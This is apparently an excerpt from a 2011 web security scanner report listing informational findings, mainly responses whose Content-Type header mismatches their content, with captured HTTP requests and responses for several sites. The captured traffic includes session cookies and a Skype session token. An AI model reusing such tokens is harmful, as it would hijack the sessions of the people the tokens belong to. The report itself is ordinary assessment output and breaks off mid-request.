Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.1.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:43 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 2090
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:29:43 GMT
Cache-control: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

25.24. http://www.w3schools.com/js/tryit_view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /js/tryit_view.asp

Request

GET /js/tryit_view.asp?filename=tryjs_text HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/tryit.asp?filename=tryjs_text
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.1.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:44 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 115
Content-Type: text/html
Cache-control: private

<html>
<body>

<script type="text/javascript">
document.write("Hello World!");
</script>

</body>
</html>

25.25. http://www.w3schools.com/jsref/demo_iframe.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/demo_iframe.htm

Request

GET /jsref/demo_iframe.htm HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/tryit_view.asp?filename=tryjsref_iframe_contentdocument
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.22.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Content-Length: 236
Content-Type: text/html
Last-Modified: Fri, 12 Mar 2010 13:25:51 GMT
Accept-Ranges: bytes
ETag: "a92a1c89e7c1ca1:4cd"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:34:26 GMT

<html>
<body>

<p>This is some text in an iframe. This is some text in an iframe. This is some text in an iframe. This is some text in an iframe. This is some text in an iframe. This is some text i
...[SNIP]...

25.26. http://www.w3schools.com/jsref/frame_a.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/frame_a.htm

Request

GET /jsref/frame_a.htm HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/tryit_view.asp?filename=tryjsref_frame_onload
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.29.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/html
Last-Modified: Fri, 05 Mar 2010 11:29:21 GMT
Accept-Ranges: bytes
ETag: "3cfcd91957bcca1:4cd"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:37:31 GMT

<html>
<body bgcolor="#66CCFF">
<h3>Frame A</h3>
</body>
</html>

25.27. http://www.w3schools.com/jsref/frame_b.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/frame_b.htm

Request

GET /jsref/frame_b.htm HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/tryit_view.asp?filename=tryjsref_frame_onload
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.29.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Content-Length: 68
Content-Type: text/html
Last-Modified: Fri, 05 Mar 2010 11:29:21 GMT
Accept-Ranges: bytes
ETag: "cad3f11957bcca1:4cd"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Mon, 05 Sep 2011 02:37:31 GMT

<html>
<body bgcolor="#EBC79E">
<h3>Frame B</h3>
</body>
</html>

25.28. http://www.w3schools.com/jsref/tryit.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/tryit.asp

Request

GET /jsref/tryit.asp?filename=tryjsref_doc_anchors2 HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/js/js_ex_dom.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.3.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Pragma: no-cache
Content-Length: 2269
Content-Type: text/html
Expires: Mon, 05 Sep 2011 02:29:51 GMT
Cache-control: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...

25.29. http://www.w3schools.com/jsref/tryit_view.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.w3schools.com
Path:   /jsref/tryit_view.asp

Request

GET /jsref/tryit_view.asp?filename=tryjsref_doc_anchors2 HTTP/1.1
Host: www.w3schools.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/jsref/tryit.asp?filename=tryjsref_doc_anchors2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDQCSSTBCB=AAMPJHHBNDGEJJEIDNKGBHML; __utma=119627022.1478965365.1315189423.1315189423.1315189423.1; __utmb=119627022.3.10.1315189423; __utmc=119627022; __utmz=119627022.1315189423.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Referrer%20data%20found%20in%20displayed%20innerHTML

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 283
Content-Type: text/html
Cache-control: private

<html>
<body>

<a name="html">HTML Tutorial</a><br />
<a name="css">CSS Tutorial</a><br />
<a name="xml">XML Tutorial</a>

<p>innerHTML of the first anchor:
<script type="text/javascript">
do
...[SNIP]...

26. Content type incorrectly stated  previous
There are 83 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


26.1. http://72d329.r.axf8.net/mr/a.gif  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://72d329.r.axf8.net
Path:   /mr/a.gif

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /mr/a.gif?a=72D329&v=1 HTTP/1.1
Host: 72d329.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 66
Content-Type: application/x-javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:17:22 GMT

gomez.b2(334411998954502,1);gomez.b1(1,1);if(gomez.n0)gomez.n0(0);

26.2. https://apps.skypeassets.com/static/skype.login/js/pwa-complete.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://apps.skypeassets.com
Path:   /static/skype.login/js/pwa-complete.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /static/skype.login/js/pwa-complete.js HTTP/1.1
Host: apps.skypeassets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/javascript
ETag: "9a7a9f712f3af68e9bdfb8778e3d5a04"
X-Stratus-Processing-Time: 0.0219
Date: Sun, 04 Sep 2011 21:40:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 211564

/*!
* jquery.qtip. The jQuery tooltip plugin
*
* Copyright (c) 2009 Craig Thompson
* http://craigsworks.com
*
* Licensed under MIT
* http://www.opensource.org/licenses/mit-license.php
*
* Launch : Fe
...[SNIP]...

26.3. https://apps.skypeassets.com/static/skype.login/js/wbr-complete.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://apps.skypeassets.com
Path:   /static/skype.login/js/wbr-complete.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /static/skype.login/js/wbr-complete.js HTTP/1.1
Host: apps.skypeassets.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/javascript
ETag: "2e0ae3e6ba50467d7fde9b606568a4e4"
X-Stratus-Processing-Time: 0.0248
Date: Sun, 04 Sep 2011 21:40:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 215522

/*!
* jquery.qtip. The jQuery tooltip plugin
*
* Copyright (c) 2009 Craig Thompson
* http://craigsworks.com
*
* Licensed under MIT
* http://www.opensource.org/licenses/mit-license.php
*
* Launch : Fe
...[SNIP]...

26.4. http://blogs.skype.com/comments.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.skype.com
Path:   /comments.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /comments.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://blogs.skype.com/en/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: blogs.skype.com
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:05:35 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Tue, 22 Mar 2011 12:25:23 GMT
ETag: "42c001-37f3-49f11569972c0"
Accept-Ranges: bytes
Content-Length: 14323
Content-Type: application/javascript

// Copyright (c) 1996-1997 Athenia Associates. http://www.webreference.com/js/
// License is granted if and only if this entire copyright notice is included.
// By Tomer Shiran.

var localization = {

...[SNIP]...

26.5. http://blogs.skype.com/en/bloggerbios.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://blogs.skype.com
Path:   /en/bloggerbios.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /en/bloggerbios.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: http://blogs.skype.com/en/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: blogs.skype.com
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:05:35 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Wed, 31 Aug 2011 12:33:06 GMT
ETag: "434187-3218-4abcc547d0480"
Accept-Ranges: bytes
Content-Length: 12824
Content-Type: application/javascript

$(function () {

if($("div.authorAboutContent").hasClass("melaniesalvatierra")) {
$("div.authorAboutContent"+"."+"melaniesalvatierra").html("I run Skype...s global media & broadcast program and launch
...[SNIP]...

26.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2377221&PluID=0&w=300&h=600&ord=6858311&ifrm=1&ucm=true&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b78/3/0/%2a/h%3B239066737%3B0-0%3B0%3B14250961%3B4986-300/600%3B41415471/41433258/1%3Bu%3D%2A%2A300x250%2C336x280%2C300x600%2C336x850%2A%2A%2A%2A%2A%2A223%2C234%2C220%2C231%2C233%2C227%2A%2A%3B%7Eokv%3D%3Bu%3D%2A%2A300x250%2C336x280%2C300x600%2C336x850%2A%2A%2A%2A%2A%2A223%2C234%2C220%2C231%2C233%2C227%2A%2A%3Bpage%3Darticle%3Bmsrc%3Dgooglenews_wsj%3Bp39%3D223%3Bp39%3D234%3Bp39%3D220%3Bp39%3D231%3Bp39%3D233%3Bp39%3D227%3B%3Bmc%3Dgoogle_fullfree%3Btile%3D5%3Bsz%3D300x250%2C336x280%2C300x600%2C336x850%3B%3B%7Eaopt%3D2/0/ff/0%3B%7Esscs%3D%3f$$&z=39 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/newscolumns_businessstory;u=**300x250,336x280,300x600,336x850******223,234,220,231,233,227**;page=article;msrc=googlenews_wsj;p39=223;p39=234;p39=220;p39=231;p39=233;p39=227;;mc=google_fullfree;tile=5;sz=300x250,336x280,300x600,336x850;ord=9507950795079507;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebOptOut=TRUE

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 04 Sep 2011 16:17:42 GMT
Connection: close
Content-Length: 2974

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

26.7. http://catrg.peer39.net/251/161/1867330751  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://catrg.peer39.net
Path:   /251/161/1867330751

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /251/161/1867330751?aid=00712&sid=00000&pu=http%3A//online.wsj.com/article/SB10001424053111904900904576549933849920392.html&cc=/7QnkE80XLKzILiqpjgeKxf/yYqPe70zfdO7mPRtaGk%3D&pr=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan+Lokey&pt=Houlihan%20Lokey%20Taps%20Weimin%20Chen%20for%20China%20Operation%20-%20WSJ.com&sd=9157640 HTTP/1.1
Host: catrg.peer39.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "d3ffe105cf30bec80e5eb82dac2f9502:1315130647"
Last-Modified: Sun, 04 Sep 2011 10:03:09 GMT
Accept-Ranges: bytes
Content-Length: 755
Content-Type: text/plain
Date: Sun, 04 Sep 2011 16:17:28 GMT
Connection: close
X-N: S

function getTargetingTags_712() { return '<?xml version="1.0" encoding="UTF-8"?><responseContainer><service><classifier><category path="Personal Finance" description="" name="Personal Finance" id="22
...[SNIP]...

26.8. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cs.wsj.net
Path:   /community/content/images/misc/groups/otherquestionmark.25x25.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /community/content/images/misc/groups/otherquestionmark.25x25.png HTTP/1.1
Host: cs.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 501
Content-Type: image/png
Content-Location: http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png
Last-Modified: Thu, 11 Aug 2011 20:27:48 GMT
Accept-Ranges: bytes
ETag: "0fa75226558cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:17:15 GMT

GIF89a.........................mmm.........vvviii.........zzz]]]...bbbrrr........................xxx~~~|||...............NNN.................................HHH..................fff.........VVV???....
...[SNIP]...

26.9. http://cs.wsj.net/community/content/images/misc/groups/politicscapitol.25x25.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cs.wsj.net
Path:   /community/content/images/misc/groups/politicscapitol.25x25.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /community/content/images/misc/groups/politicscapitol.25x25.png HTTP/1.1
Host: cs.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 529
Content-Type: image/png
Content-Location: http://cs.wsj.net/community/content/images/misc/groups/politicscapitol.25x25.png
Last-Modified: Thu, 11 Aug 2011 20:27:48 GMT
Accept-Ranges: bytes
ETag: "0fa75226558cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:17:15 GMT

GIF89a.........................VVVlll........................www....................................................................................}}}.................................qqq.............
...[SNIP]...

26.10. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cs.wsj.net
Path:   /community/content/images/misc/members/defaultuser.50x50.png

Issue detail

The response contains the following Content-type statement:The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /community/content/images/misc/members/defaultuser.50x50.png HTTP/1.1
Host: cs.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 1559
Content-Type: image/png
Content-Location: http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png
Last-Modified: Thu, 11 Aug 2011 20:27:48 GMT
Accept-Ranges: bytes
ETag: "0fa75226558cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 16:17:15 GMT

GIF89a2.2.......DDD...888.........KKKUUUYYYjjj...aaahhh...^^^........................fff.........QQQ...ddd...........................uuuyyy~~~xxxsssrrr{{{}}}qqqttt|||...ooo......nnnmmm...lll...zzzvvvw
...[SNIP]...

26.11. http://cymphonix.app3.hubspot.com/salog.js.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cymphonix.app3.hubspot.com
Path:   /salog.js.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /salog.js.aspx HTTP/1.1
Host: cymphonix.app3.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 497
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=9wx8yO-JzQEkAAAAZDlmMTg2YTAtZDZhNS00N2EyLTk0M2MtNDgyZmQ3MjRmMDc40; expires=Mon, 03-Sep-2012 16:18:41 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=26d75963-767c-4ca2-894f-e053f209e8bf; domain=cymphonix.app3.hubspot.com; expires=Sat, 04-Sep-2021 05:00:00 GMT; path=/; HttpOnly
Date: Sun, 04 Sep 2011 16:18:41 GMT
Set-Cookie: HUBSPOT159=152114348.0.0000; path=/


var hsUse20Servers = true;
var hsDayEndsIn = 42078;
var hsWeekEndsIn = 42078;
var hsMonthEndsIn = 2288478;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-09-04 12:18:
...[SNIP]...

26.12. http://dellinc.tt.omtrdc.net/m2/dellinc/mbox/ajax  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://dellinc.tt.omtrdc.net
Path:   /m2/dellinc/mbox/ajax

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /m2/dellinc/mbox/ajax?mboxHost=content.dell.com&mboxSession=1315153150925-582363&mboxPage=1315153156805-386656&screenHeight=1200&screenWidth=1920&browserWidth=1049&browserHeight=910&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&hr=11&day=0&mon=9&cookie_chmTP=&mboxCount=3&mbox=MboxTrack&mboxId=0&mboxTime=1315135156805&clicked=undefined&mboxURL=http%3A%2F%2Fcontent.dell.com%2Fus%2Fen%2Fbusiness%2Fsecurity-network.aspx%3Fst%3Dapplication%2520security%2520web%26dgc%3DST%26cid%3D64824%26lid%3D1652027%26acd%3Ds1CStlI5S%2C13885348293%2C901qz26673&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DHoulihan%2BLokey%23sclient%3Dpsy%26hl%3Den%26source%3Dhp%26q%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26pbx%3D1%26oq%3Dwaf%2Bweb%2Bapplication%2Bsecurity%26aq%3Df%26aqi%3Dq-w1%26aql%3D%26gs_sm%3De%26gs_upl%3D21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0%26bav%3Don.2%2Cor.r_gc.r_pw.%26fp%3Db7e6040383bebbf%26biw%3D1049%26bih%3D910&mboxVersion=40 HTTP/1.1
Host: dellinc.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
